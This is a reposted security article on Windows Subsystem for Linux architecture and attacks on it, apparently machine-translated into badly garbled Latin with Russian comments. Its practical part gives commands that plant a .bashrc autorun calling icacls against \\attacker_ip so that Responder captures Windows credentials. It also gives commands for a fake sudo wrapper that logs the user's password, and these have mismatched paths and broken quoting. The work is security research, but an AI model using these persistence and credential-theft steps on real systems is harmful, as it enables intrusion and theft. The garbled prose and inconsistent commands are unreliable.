ProHoster > Блог > administratio > WSL experimenta. Pars I

WSL experimenta. Pars I

Salve, habr! OTUS novum cursum amnis mense Octobri immittit "Securitas Linux". In antecessum initium cursus, communicamus tecum articulum ab uno ex nostris magistris Alexandro Kolesnikov conscriptum.

WSL experimenta. Pars I

Anno 2016, Microsoft novam technologiam WSL ad IT communitatem introduxit (Windows Subsystem for Linux), quod in futuro effecit, ut competitores ante conciliabiles conciliarent, qui popularitate inter tam ordinarios et provectiores OS utentes pugnabant: Windows et Linux. Haec technologia effecit ut instrumentis Linux OS in fenestra environment sine necessitate Linux currere, exempli gratia, Multis tabernus utens. In Habr invenire potes magnum numerum articulorum describentium utilitates WSL utendi. Nihilominus, proh dolor, tempore creationis huius articuli, nulla studia de securitate talium symbiosis systemata operandi in hoc subsidio inventa sunt. Haec post haec emendare conatum erit. Articulus de notis architecturarum WSL 1 et 2 loquetur et plura exempla oppugnationum in systematis technologiarum utentibus examinabit. Articulus dividitur in 2 partes. Prima methodorum theoricae oppugnationis ex Linux et Fenestra principalis providebit. Secundus articulus involvit probationem environment et impetus effingit.

WSL I: architectonica

Ut accurate in WSL quaestiones securitatis intendere, necesse est praecipuas nuances associatas cum exsecutione subsystem determinare. Una praecipuorum usorum munerum a WSL solvenda est facultas operandi per Linux terminalem in Fenestra OS currentis hospitis. Item, compatibilitas oblata tam indigena fuit ut Linux executables (ELFs) directe currere posset in systemate Windows. Ad has metas assequendas, subsystem speciale in Windows 10 creatum est quod te permittit ut applicationes Linux currere ad certam systematis rationem adhibitis - ita, conatus factus est ut praefinitum Linux syscallorum in Fenestra describat. Hoc physice effectum est additis novis rectoribus et nova forma processuum. Architectura visui similis est:

WSL experimenta. Pars I

Revera, commercium cum Linux operandi ratio per plures modulos nucleos et specialem rationem processus - pico ordinabatur. Ex schemate supra, videre potes processum instantiae Linux in exercitu currentem esse indigenam et iisdem facultatibus uti Fenestra applicationibus regularibus uti. Sed quomodo id consequatur? In project drawbridge Processus notiones in Fenestra elaboratae sunt quae omnia necessaria systematis operantis (prout in versione sua) ad applicationem alterius OS currerent.

Nota propositum abstractionis effecit ut in systemate operativo (in particulari, Windows), in quo processus alterius OS deducendi expectatur, et accessum generalem suggessit.

Sic, quaelibet applicatio processus pico intra nucleum fenestrarum sine respectu currere potuit:

  1. Problemata compatibilitatis et translationis rationum vocatorum a specialibus provisoribus solvendae sunt;
  2. Accessus control per Monitor Securitatis fieri debet. Monitor in nucleo sita est et propterea Fenestra opus upgrade in forma novi exactoris, qui provisor talium processuum agere posset. Processus picus prototypus schematically exhibetur infra:

WSL experimenta. Pars I

Cum Linux fasciculi systematis lima sensitivo utitur et nomina presul, 2 genera systematum fasciculi in Fenestra additi sunt ad operandum cum WSL - VolFS et DriveFS. VolFS exsecutio systematis fasciculi Linux est, DriveFS systema fasciculi qui secundum fenestras regulas operatur, sed facultas eligendi casus sensibilitatem habet.

WSL 2

WSL 1 complures limitationes habuit quae non permisit ad maximum negotium solvendum adhibitum: exempli gratia, facultatem non habuit applicationes Linux 32 frenum currere, et regentibus fabrica uti non potuit. Ergo anno 2020, WSL 2 dimissus est, qui aditum ad subsystem aedificandum mutavit. WSL 2 machina virtualis optimized est quae subsidii consumptioni notarum WSL 1 aequet. Nunc, secundum problemata usoris Windows OS solvenda, eligere potes debitam versionem Linux subsystem. Ad vulnerabilitates mitigandas possibiles, WSL 2 ad Hyper-V in Fenestra substructum impletum est 10. Hac forma, Fenestra facultatem habet nucleum in seiunctis systematis operandi Linux currere. Memorabile est quod versionis 1 of WSL inducta est ut pluma beta quae in hac provincia directionem Fenestrae evolutionis ostendere putabatur, sic transitus ad Hyper-V inevitabilis fuit. Architectura finalis hoc modo spectat:

WSL experimenta. Pars I

In hac versione, Windows et Linux nucleos suas facultates habent et intersectio solum in systemate tabella exsistit, sed haec intersectio perfecta non est. Commercium inter systemata fasciculi exercetur per serratorem clientis qui opera utitur 9P protocollo.

Hodie Microsoft facultatem praebet commutandi inter WSL 1 et WSL 2. Ambae versiones usui praesto sunt.

WSL Securitatis

In momento, plura opera sunt quae describit aditus aliquos utendi legitimo OS instrumentorum ad communicationem inter subsystematis oppugnandum. Scripta eorum utemur ad reprimendas impetus impetus in tempore scribendi. General Index impugnationum et missionum;

1. Exsecutio systematis fasciculi: accessus iura, dispositio directorium communium/notitiarum machinarum commutationum.

Investigatio deductus est determinare praecepta de violationibus accessum Linux FS->Windows FS, Windows FS->Linux FS. Investigatio demonstravit facultatem datam fasciculi mutandi intra scopum OS. Conatus etiam factae sunt substituere, duplicata creare et partem rationum tabellariorum delere.

varius varius:

  • A. Impetum e Fenestra systematis operantis - modificatio imaginum e /etc directorio Linux OS.
  • B. Impetum ab Linux systemate operante - modificatio imaginum in directoriis: C:Windows, C:Program Files, C:Users<User>

2. exsequendam network acervus.

Investigatio facta est per exempla oppugnationum de Linux systemate operante in Fenestra. Lineamenta acervi retis adhibebantur, nempe machinationes authenticas in variis facultatibus.

varius varius:

  • Aditum aditum ad portum qui in Fenestra systema versatur
  • portum aperiens sine iuribus congruis
  • Cursor concha adversa utens lima elf lima in Fenestra operante ratio.

3. Abscondere discursum malignorum processuum programmatum utentium subsystem WSL.

Investigatio de facto simplici fundata est - securitatis subsystematum in alio nucleo intercipere non possunt, qui legitimo provisore utens operante systemate operante in casu WSL 1. In casu WSL 2, nullus est modus ad videndum eventus qui fiunt. in separato nucleo intra leve virtualis apparatus.

varius varius:

1) Duc applicationis ad accessum remotum ad systema et rerum initium speculandum.

WSL 1 experimenta: Nullam interceptio (Fenestra)

Tandem ad practicam partem venimus. Primum, experimentum elit constituere debes. Omnia experimenta in scamno exercebuntur cum Fenestra 10 2004 inaugurata. Ubuntu 18.04 imago electa est ut imaginem systematis operantis WSL. Fortuito electa est imago, et quaelibet alia idem faciet. Imperat ut statuat;

Primum oportet te launch powershell.exe ut administrator.

Nam WSL 1 debes currere mandata;

  1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Включить функцию WSL
  2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-OutFile ~/Ubuntu.appx -UseBasicParsing #Загрузить образ Linux из магазина Microsoft

  • Ubuntu.appx install —root #Установим образ
  • Возможно, придется прокликать процесс настройки и создать нового пользователя, который будет иметь меньше прав, чем root. Для наших тестов это будет обычный пользователь sam.
  • Restart-Computer #Перезагрузим

    • Post rebooting sta, imperium vercundus vocare potes. Si omnia recte operata sunt, outputum simile huic in Fenestra consolatorio videbis:

    WSL experimenta. Pars I

    Utemur distributione Kali Linux pro machina oppugnatoris: omnes machinae in eodem reticulo locali esse debent.

    Ponamus nos aditum ad WSL inexplicabilis in machina Fenestra. Conemur oppugnare Linux systema operantem vocando mandatum a Linux. Ad oppugnationem efficiendam, artificio simplici autoruni utemur - scripturam nostram ad executionem in ambitu Linux addemus. Hoc facere debes mutare tabella .bashrc.

    In machina cum WSL exequimur:

    	1. bash
	2. Переходим в домашнюю директорию пользователя: cd /home/sam/
	2. echo  «/home/sam/.attack.sh» >> .bashrc
	3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

    In machina Kali Linux curritur:

    1. Responder -I eth0 -rdvw

    In machina Fenestra, Lorem vercundus.

    Exspectamus eventum in machina Kali Linux:

    WSL experimenta. Pars I

    Ita usuram Fenestram in ratiocinatione Linux per subsystem subsystem exequendo consecuti sumus.

    WSL 1 experimenta: user password obtinens (Linux OS)

    Experimentum unum faciamus. Per hanc reprehendo tabellam addemus .bashrc plura mandata ad obtinendum Linux operandi ratio tesserae usoris.

    Paginam demus et iussa ingrediamur:

    1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

    Ad oppugnationem perficiendam, usor Sam sudo in termino Linux vocare debet. Post hoc, tessera usoris Linux OS in tabella erit pass.txt:

    WSL experimenta. Pars I

    Impetus ad exsequendum solum informationes theoreticae datae sunt.

    Postera pars articuli exsecutionem protocolli 9P describet, creationem scanner huius protocolli considera, et etiam impetum utentem explere.

    Index litterarum usus

    WSL experimenta. Pars I

    Lege plus

    Source: www.habr.com

    Add a comment